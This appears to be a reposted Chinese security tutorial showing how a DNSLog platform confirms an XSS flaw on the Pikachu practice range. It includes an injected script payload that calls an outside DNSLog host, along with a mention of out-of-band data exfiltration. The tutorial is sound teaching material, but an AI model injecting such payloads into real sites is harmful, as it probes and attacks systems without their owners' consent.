DNSLog漏洞探测(三)之XSS漏洞实战
2023-12-13 06:41:36
DNSLog漏洞探测(三)之XSS漏洞实战
通过前面的学习,我们已经明白了什么是DNSLog平台,那么DNSLog平台到底能为我们做些什么呢?
DNSLog的平台实际使用很长见的一种情况就是针对漏洞无回显的情况,我们通过让受害者的服务器主动发起对DNSLog服务平台的请求去外带一些信息,但更多的使用场景是我们仅仅使用DNSLog去作为探测漏洞是否存在的一种手段。比如XSS(跨站脚本攻击)漏洞、RCE(远程代码执行)漏洞、XXE(XML外部实体注入)漏洞、SSRF(服务器请求伪造)漏洞等。假如目标网站没有存在漏洞,那么DNSLog平台是不会出现解析记录的。这种情况下,我们利用DNSLog平台仅仅是为了验证该漏洞是否存在。
如果我们需要用DNSLog平台去探测一个网站是否存在XSS漏洞,那么我们该怎么操作呢?
首先我们先打开DNSLog平台,点击 Get SubDomain 获取一个子域名
这里我们获取到的子域名是 p9coa4.dnslog.cn
这里我们使用Pikachu的靶场作为演示
接下来,由于这里文本框的长度是有限制的,所以我们先按下 F12,将文本框的长度参数修改为200
然后在文本框提交我们的payload,那么如何构造我们的payload呢?
#原始payload
<script src=http://xxxxxx.dnslog.cn></script>
#只需要将xxxxxx.dnslog.cn的内容替换为我们获取到的子域名
<script src=http://p9coa4.dnslog.cn></script>
我们只需要将xxxxxx.dnslog.cn的内容替换为我们获取到的子域名,并放入文本框点击提交就好了
点击提交后
现在我们回到DNSLog服务平台,点击 Refresh Record刷新,然后DNSLog服务平台便会返回给我们DNSLog解析记录,这下我们就通过DNSLog平台验证了该处存在XSS漏洞
文章来源:https://blog.csdn.net/qq_64973687/article/details/134943693
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!